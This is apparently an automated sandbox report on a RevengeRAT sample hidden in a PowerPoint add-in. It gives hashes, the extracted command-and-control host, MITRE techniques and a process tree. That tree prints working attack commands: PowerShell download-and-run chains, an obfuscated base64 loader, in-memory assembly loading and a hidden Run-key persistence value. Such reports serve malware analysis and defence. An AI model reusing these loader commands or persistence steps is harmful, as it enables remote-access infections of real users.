revengerat | c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e

General

Target

Reserva Detalhes.ppam
Size

12KB
MD5

a1d2e92429553425cf7505c8563b84ed
SHA1

d5550fa4da1db73fb15f3fcdd8935504350c392b
SHA256

c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e
SHA512

9db3cce89055888cf4f7ef8db57dc171fa48f16a5d6724a540f16b365514672e6ec283b25cf6a3e7985c5dd57d5c7538263da690596eaa71dcac7cfeaf677f98
SSDEEP

192:xrXP/Rz9m/qgC0XvXUyhRT2QiDjhmdihVGBZGinvSo0Ctbc7PHET:dXPWqgvXmQiDVm8GBklWbc7PG

Score

10^/10

revengerat nyancatrevenge persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pt.textbin.net/download/zbbh8tfbo9

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

marcelotatuape.ddns.net:333

Mutex

0f84d46907494

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2736	3220	powershell.exe	POWERPNT.EXE

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow	pid	process
40	2736	powershell.exe
52	2736	powershell.exe
58	2036	powershell.exe
62	2036	powershell.exe
74	2036	powershell.exe
80	2036	powershell.exe
85	1960	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cierf = "Powershell.exe -WindowStyle hidden -executionpolicy bypass \"& 'C:\\Users\\Admin\\AppData\\Roaming\\wlfjl.ps1' \";exit"	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1960 set thread context of 2448 1960 powershell.exe MSBuild.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 1960 set thread context of 2448	1960	powershell.exe	MSBuild.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE

Modifies registry class 1 IoCs

Processes:

explorer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings explorer.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3220 POWERPNT.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings	explorer.exe

pid	process
3220	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2736	powershell.exe
2736	powershell.exe
2736	powershell.exe
3716	powershell.exe
3716	powershell.exe
3716	powershell.exe
2036	powershell.exe
2036	powershell.exe
2036	powershell.exe
2036	powershell.exe
3440	powershell.exe
3440	powershell.exe
3440	powershell.exe
1960	powershell.exe
1960	powershell.exe
1960	powershell.exe
1960	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

POWERPNT.EXE

pid process

3220 POWERPNT.EXE
3220 POWERPNT.EXE
3220 POWERPNT.EXE

pid	process
3220	POWERPNT.EXE
3220	POWERPNT.EXE
3220	POWERPNT.EXE

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

POWERPNT.EXEpowershell.exeexplorer.exeWScript.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3220 wrote to memory of 2736	3220	POWERPNT.EXE	powershell.exe
PID 3220 wrote to memory of 2736	3220	POWERPNT.EXE	powershell.exe
PID 2736 wrote to memory of 2012	2736	powershell.exe	explorer.exe
PID 2736 wrote to memory of 2012	2736	powershell.exe	explorer.exe
PID 1276 wrote to memory of 4128	1276	explorer.exe	svchost.exe
PID 1276 wrote to memory of 4128	1276	explorer.exe	svchost.exe
PID 4128 wrote to memory of 3716	4128	WScript.exe	powershell.exe
PID 4128 wrote to memory of 3716	4128	WScript.exe	powershell.exe
PID 3716 wrote to memory of 2036	3716	powershell.exe	powershell.exe
PID 3716 wrote to memory of 2036	3716	powershell.exe	powershell.exe
PID 2036 wrote to memory of 3440	2036	powershell.exe	powershell.exe
PID 2036 wrote to memory of 3440	2036	powershell.exe	powershell.exe
PID 2036 wrote to memory of 888	2036	powershell.exe	cmd.exe
PID 2036 wrote to memory of 888	2036	powershell.exe	cmd.exe
PID 2036 wrote to memory of 1960	2036	powershell.exe	powershell.exe
PID 2036 wrote to memory of 1960	2036	powershell.exe	powershell.exe
PID 1960 wrote to memory of 2448	1960	powershell.exe	MSBuild.exe
PID 1960 wrote to memory of 2448	1960	powershell.exe	MSBuild.exe
PID 1960 wrote to memory of 2448	1960	powershell.exe	MSBuild.exe
PID 1960 wrote to memory of 2448	1960	powershell.exe	MSBuild.exe
PID 1960 wrote to memory of 2448	1960	powershell.exe	MSBuild.exe
PID 1960 wrote to memory of 2448	1960	powershell.exe	MSBuild.exe
PID 1960 wrote to memory of 2448	1960	powershell.exe	MSBuild.exe
PID 1960 wrote to memory of 2448	1960	powershell.exe	MSBuild.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Reserva Detalhes.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/Uu-eVHlE/Rka0iUpD.1b3c3483be5eabe21a44cc4fbefcdd0d -o test.js; explorer.exe test.js
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736

C:\Windows\explorer.exe
"C:\Windows\explorer.exe" test.js
3⤵
PID:2012

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $SOgfL = 'J↪Ⅻ↫BE↪Ⅻ↫GM↪Ⅻ↫d↪Ⅻ↫Bz↪Ⅻ↫E0↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫9↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫K↪Ⅻ↫BO↪Ⅻ↫GU↪Ⅻ↫dw↪Ⅻ↫t↪Ⅻ↫E8↪Ⅻ↫YgBq↪Ⅻ↫GU↪Ⅻ↫YwB0↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫TgBl↪Ⅻ↫HQ↪Ⅻ↫LgBX↪Ⅻ↫GU↪Ⅻ↫YgBD↪Ⅻ↫Gw↪Ⅻ↫aQBl↪Ⅻ↫G4↪Ⅻ↫d↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫Ds↪Ⅻ↫J↪Ⅻ↫BE↪Ⅻ↫GM↪Ⅻ↫d↪Ⅻ↫Bz↪Ⅻ↫E0↪Ⅻ↫LgBF↪Ⅻ↫G4↪Ⅻ↫YwBv↪Ⅻ↫GQ↪Ⅻ↫aQBu↪Ⅻ↫Gc↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫9↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫WwBT↪Ⅻ↫Hk↪Ⅻ↫cwB0↪Ⅻ↫GU↪Ⅻ↫bQ↪Ⅻ↫u↪Ⅻ↫FQ↪Ⅻ↫ZQB4↪Ⅻ↫HQ↪Ⅻ↫LgBF↪Ⅻ↫G4↪Ⅻ↫YwBv↪Ⅻ↫GQ↪Ⅻ↫aQBu↪Ⅻ↫Gc↪Ⅻ↫XQ↪Ⅻ↫6↪Ⅻ↫Do↪Ⅻ↫VQBU↪Ⅻ↫EY↪Ⅻ↫O↪Ⅻ↫↪Ⅻ↫7↪Ⅻ↫CQ↪Ⅻ↫RwBh↪Ⅻ↫GI↪Ⅻ↫agBo↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫PQ↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫R↪Ⅻ↫Bj↪Ⅻ↫HQ↪Ⅻ↫cwBN↪Ⅻ↫C4↪Ⅻ↫R↪Ⅻ↫Bv↪Ⅻ↫Hc↪Ⅻ↫bgBs↪Ⅻ↫G8↪Ⅻ↫YQBk↪Ⅻ↫FM↪Ⅻ↫d↪Ⅻ↫By↪Ⅻ↫Gk↪Ⅻ↫bgBn↪Ⅻ↫Cg↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫n↪Ⅻ↫Gg↪Ⅻ↫d↪Ⅻ↫B0↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫cw↪Ⅻ↫6↪Ⅻ↫C8↪Ⅻ↫LwBw↪Ⅻ↫HQ↪Ⅻ↫LgB0↪Ⅻ↫GU↪Ⅻ↫e↪Ⅻ↫B0↪Ⅻ↫GI↪Ⅻ↫aQBu↪Ⅻ↫C4↪Ⅻ↫bgBl↪Ⅻ↫HQ↪Ⅻ↫LwBk↪Ⅻ↫G8↪Ⅻ↫dwBu↪Ⅻ↫Gw↪Ⅻ↫bwBh↪Ⅻ↫GQ↪Ⅻ↫LwB6↪Ⅻ↫GI↪Ⅻ↫YgBo↪Ⅻ↫Dg↪Ⅻ↫d↪Ⅻ↫Bm↪Ⅻ↫GI↪Ⅻ↫bw↪Ⅻ↫5↪Ⅻ↫Cc↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫Ds↪Ⅻ↫J↪Ⅻ↫BE↪Ⅻ↫GM↪Ⅻ↫d↪Ⅻ↫Bz↪Ⅻ↫E0↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫9↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫J↪Ⅻ↫BE↪Ⅻ↫GM↪Ⅻ↫d↪Ⅻ↫Bz↪Ⅻ↫E0↪Ⅻ↫LgBE↪Ⅻ↫G8↪Ⅻ↫dwBu↪Ⅻ↫Gw↪Ⅻ↫bwBh↪Ⅻ↫GQ↪Ⅻ↫UwB0↪Ⅻ↫HI↪Ⅻ↫aQBu↪Ⅻ↫Gc↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫RwBh↪Ⅻ↫GI↪Ⅻ↫agBo↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫KQ↪Ⅻ↫7↪Ⅻ↫Fs↪Ⅻ↫QgB5↪Ⅻ↫HQ↪Ⅻ↫ZQBb↪Ⅻ↫F0↪Ⅻ↫XQ↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫RwBE↪Ⅻ↫Gk↪Ⅻ↫UQBj↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫PQ↪Ⅻ↫g↪Ⅻ↫Fs↪Ⅻ↫UwB5↪Ⅻ↫HM↪Ⅻ↫d↪Ⅻ↫Bl↪Ⅻ↫G0↪Ⅻ↫LgBD↪Ⅻ↫G8↪Ⅻ↫bgB2↪Ⅻ↫GU↪Ⅻ↫cgB0↪Ⅻ↫F0↪Ⅻ↫Og↪Ⅻ↫6↪Ⅻ↫EY↪Ⅻ↫cgBv↪Ⅻ↫G0↪Ⅻ↫QgBh↪Ⅻ↫HM↪Ⅻ↫ZQ↪Ⅻ↫2↪Ⅻ↫DQ↪Ⅻ↫UwB0↪Ⅻ↫HI↪Ⅻ↫aQBu↪Ⅻ↫Gc↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫R↪Ⅻ↫Bj↪Ⅻ↫HQ↪Ⅻ↫cwBN↪Ⅻ↫C4↪Ⅻ↫UgBl↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫b↪Ⅻ↫Bh↪Ⅻ↫GM↪Ⅻ↫ZQ↪Ⅻ↫o↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫JwCTITo↪Ⅻ↫kyEn↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫L↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫Cc↪Ⅻ↫QQ↪Ⅻ↫n↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫KQ↪Ⅻ↫g↪Ⅻ↫Ck↪Ⅻ↫OwBb↪Ⅻ↫FM↪Ⅻ↫eQBz↪Ⅻ↫HQ↪Ⅻ↫ZQBt↪Ⅻ↫C4↪Ⅻ↫QQBw↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫R↪Ⅻ↫Bv↪Ⅻ↫G0↪Ⅻ↫YQBp↪Ⅻ↫G4↪Ⅻ↫XQ↪Ⅻ↫6↪Ⅻ↫Do↪Ⅻ↫QwB1↪Ⅻ↫HI↪Ⅻ↫cgBl↪Ⅻ↫G4↪Ⅻ↫d↪Ⅻ↫BE↪Ⅻ↫G8↪Ⅻ↫bQBh↪Ⅻ↫Gk↪Ⅻ↫bg↪Ⅻ↫u↪Ⅻ↫Ew↪Ⅻ↫bwBh↪Ⅻ↫GQ↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫RwBE↪Ⅻ↫Gk↪Ⅻ↫UQBj↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫KQ↪Ⅻ↫u↪Ⅻ↫Ec↪Ⅻ↫ZQB0↪Ⅻ↫FQ↪Ⅻ↫eQBw↪Ⅻ↫GU↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫Cc↪Ⅻ↫QwBs↪Ⅻ↫GE↪Ⅻ↫cwBz↪Ⅻ↫Ew↪Ⅻ↫aQBi↪Ⅻ↫HI↪Ⅻ↫YQBy↪Ⅻ↫Hk↪Ⅻ↫Mw↪Ⅻ↫u↪Ⅻ↫EM↪Ⅻ↫b↪Ⅻ↫Bh↪Ⅻ↫HM↪Ⅻ↫cw↪Ⅻ↫x↪Ⅻ↫Cc↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫C4↪Ⅻ↫RwBl↪Ⅻ↫HQ↪Ⅻ↫TQBl↪Ⅻ↫HQ↪Ⅻ↫a↪Ⅻ↫Bv↪Ⅻ↫GQ↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫Cc↪Ⅻ↫c↪Ⅻ↫By↪Ⅻ↫EY↪Ⅻ↫VgBJ↪Ⅻ↫Cc↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫C4↪Ⅻ↫SQBu↪Ⅻ↫HY↪Ⅻ↫bwBr↪Ⅻ↫GU↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫k↪Ⅻ↫G4↪Ⅻ↫dQBs↪Ⅻ↫Gw↪Ⅻ↫L↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫Fs↪Ⅻ↫bwBi↪Ⅻ↫Go↪Ⅻ↫ZQBj↪Ⅻ↫HQ↪Ⅻ↫WwBd↪Ⅻ↫F0↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫o↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫JwBy↪Ⅻ↫GU↪Ⅻ↫dwBl↪Ⅻ↫Gk↪Ⅻ↫dg↪Ⅻ↫9↪Ⅻ↫GU↪Ⅻ↫YwBy↪Ⅻ↫HU↪Ⅻ↫bwBz↪Ⅻ↫F8↪Ⅻ↫bQB0↪Ⅻ↫HU↪Ⅻ↫PwB0↪Ⅻ↫Hg↪Ⅻ↫d↪Ⅻ↫↪Ⅻ↫u↪Ⅻ↫DQ↪Ⅻ↫Mg↪Ⅻ↫w↪Ⅻ↫DI↪Ⅻ↫Lg↪Ⅻ↫z↪Ⅻ↫D↪Ⅻ↫↪Ⅻ↫Lg↪Ⅻ↫1↪Ⅻ↫D↪Ⅻ↫↪Ⅻ↫LwBk↪Ⅻ↫GE↪Ⅻ↫bwBs↪Ⅻ↫G4↪Ⅻ↫dwBv↪Ⅻ↫GQ↪Ⅻ↫LwBM↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫VwBH↪Ⅻ↫Ho↪Ⅻ↫dQBY↪Ⅻ↫G0↪Ⅻ↫LwBt↪Ⅻ↫G8↪Ⅻ↫Yw↪Ⅻ↫u↪Ⅻ↫HQ↪Ⅻ↫a↪Ⅻ↫Bn↪Ⅻ↫Gk↪Ⅻ↫eg↪Ⅻ↫u↪Ⅻ↫GU↪Ⅻ↫cgBh↪Ⅻ↫Gg↪Ⅻ↫cw↪Ⅻ↫v↪Ⅻ↫C8↪Ⅻ↫OgBz↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫d↪Ⅻ↫B0↪Ⅻ↫Gg↪Ⅻ↫Jw↪Ⅻ↫g↪Ⅻ↫Cw↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫n↪Ⅻ↫CU↪Ⅻ↫R↪Ⅻ↫BD↪Ⅻ↫F↪Ⅻ↫↪Ⅻ↫SgBV↪Ⅻ↫CU↪Ⅻ↫Jw↪Ⅻ↫s↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫JwB0↪Ⅻ↫HI↪Ⅻ↫dQBl↪Ⅻ↫DE↪Ⅻ↫Jw↪Ⅻ↫g↪Ⅻ↫Ck↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫Ds↪Ⅻ↫';$SOgfL = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $SOgfL.replace('↪Ⅻ↫','A') ));$SOgfL = $SOgfL.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js');powershell $SOgfL
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$DctsM = (New-Object Net.WebClient);$DctsM.Encoding = [System.Text.Encoding]::UTF8;$Gabjh = $DctsM.DownloadString( 'https://pt.textbin.net/download/zbbh8tfbo9' );$DctsM = $DctsM.DownloadString( $Gabjh );[Byte[]] $GDiQc = [System.Convert]::FromBase64String( $DctsM.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $GDiQc ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'reweiv=ecruos_mtu?txt.4202.30.50/daolnwod/LpWGzuXm/moc.thgiz.erahs//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'true1' ) );"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Roaming\x2.ps1"
5⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3440

C:\Windows\system32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
5⤵
PID:888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\wlfjl.ps1"
5⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:2448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=2280,i,8281149332300504990,9122875031903898779,262144 --variations-seed-version /prefetch:8
1⤵
PID:3440

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

4

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d658b875850e17324fb664a2a59d6005

SHA1
f2e74d5bddfdb52222713559cc07c7c28c439d63

SHA256
b64ac291ac4a285253494ae1303a242b14f5ea58925ba94c58f6f8be4c50599d

SHA512
7ebc0228bb5523a5f1c86f429c00894221a64579872a65feab66b1124137bceb2de4d679faccc80ac3bfef9af6a163ad4a306dc40822921164fa80dd2266b0ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
7933ae594aa37e39ab28ae92b52e8922

SHA1
efccb619c0043b0ca89158fb1df1ec324bf4b253

SHA256
d2af9bda269e6d6d28a453df20a01fb1d6ab258e32a86d09a1ae5d8aba232740

SHA512
b64320ccffdbd2d48fca1c63cd811cc7137d08e62dec264dddea9d170094571ece920bf3505d0bbd05247cba56ce1498303b1d29ecd2c8460ffc1cf43de7bab1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0kls0c33.gag.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.js
Filesize
5KB

MD5
fa54e506145428be81c904ce0427bc89

SHA1
f312b61589c99b86cb4a1d582f6bc8b70b1b8ff7

SHA256
423fcc28cba08d45837d483804b93674017f7bd835941075ae49b240a9e19e80

SHA512
9ee60151d351aadce0ddad3b8a2da21489bac004ff6eba59cd3ae0a34309cfe39b67dc8f5428ac93cc128a37a4422918b569aeb5291382801851a8030327ffad

Download Submit
C:\Users\Admin\AppData\Roaming\wlfjl.ps1
Filesize
112KB

MD5
db403843ffd1681a18f96e7ab6896d2c

SHA1
5abd4e5f70ba48915221a7a093d8f1e494481370

SHA256
979253dcc2b75e0433410d32b12cc0e8a0bc7124e608015acd2d89b8452ebf94

SHA512
a531a5df01f30911f52274ab985c28d3427f4854607a774ab23ddf98f735a62ea6f4a62fdc787a00ecf4bcfab6ac567247fa83563f037acaa0422c4035518890

Download Submit
C:\Users\Admin\AppData\Roaming\x2.ps1
Filesize
250B

MD5
f1f89acbe03f9c8c4197601b9c5e763d

SHA1
81e1921b9538d13d5058f85e923f24ec0cbcde9c

SHA256
0ada1d33997a002a18773618e68fcdbdd6df9411c6f94cc760468dfaf766b4c3

SHA512
fb8381d84d1efcc6b51c0bfd4f3c45b17e5685e7fe68e1d8f0b8be00f48deecae2cec6e8c4f11368c315ce04b20704fd32b0a19020225b7fce708956fc8300fa

Download Submit
memory/1960-141-0x000002546E060000-0x000002546E068000-memory.dmp

Filesize
32KB

Download
memory/1960-138-0x000002546E040000-0x000002546E050000-memory.dmp

Filesize
64KB

Download
memory/1960-128-0x00007FF95E210000-0x00007FF95ECD1000-memory.dmp

Filesize
10.8MB

Download
memory/1960-144-0x00007FF95E210000-0x00007FF95ECD1000-memory.dmp

Filesize
10.8MB

Download
memory/2036-90-0x00000277E8480000-0x00000277E8490000-memory.dmp

Filesize
64KB

Download
memory/2036-122-0x00007FF95E210000-0x00007FF95ECD1000-memory.dmp

Filesize
10.8MB

Download
memory/2036-88-0x00007FF95E210000-0x00007FF95ECD1000-memory.dmp

Filesize
10.8MB

Download
memory/2036-89-0x00000277E8480000-0x00000277E8490000-memory.dmp

Filesize
64KB

Download
memory/2036-100-0x00000277E8900000-0x00000277E8908000-memory.dmp

Filesize
32KB

Download
memory/2448-147-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

Filesize
64KB

Download
memory/2448-148-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/2448-145-0x00000000744F0000-0x0000000074CA0000-memory.dmp

Filesize
7.7MB

Download
memory/2448-149-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

Filesize
64KB

Download
memory/2448-146-0x0000000005590000-0x0000000005B34000-memory.dmp

Filesize
5.6MB

Download
memory/2448-142-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2736-42-0x0000013BE37B0000-0x0000013BE37C0000-memory.dmp

Filesize
64KB

Download
memory/2736-71-0x00007FF94EDC0000-0x00007FF94F881000-memory.dmp

Filesize
10.8MB

Download
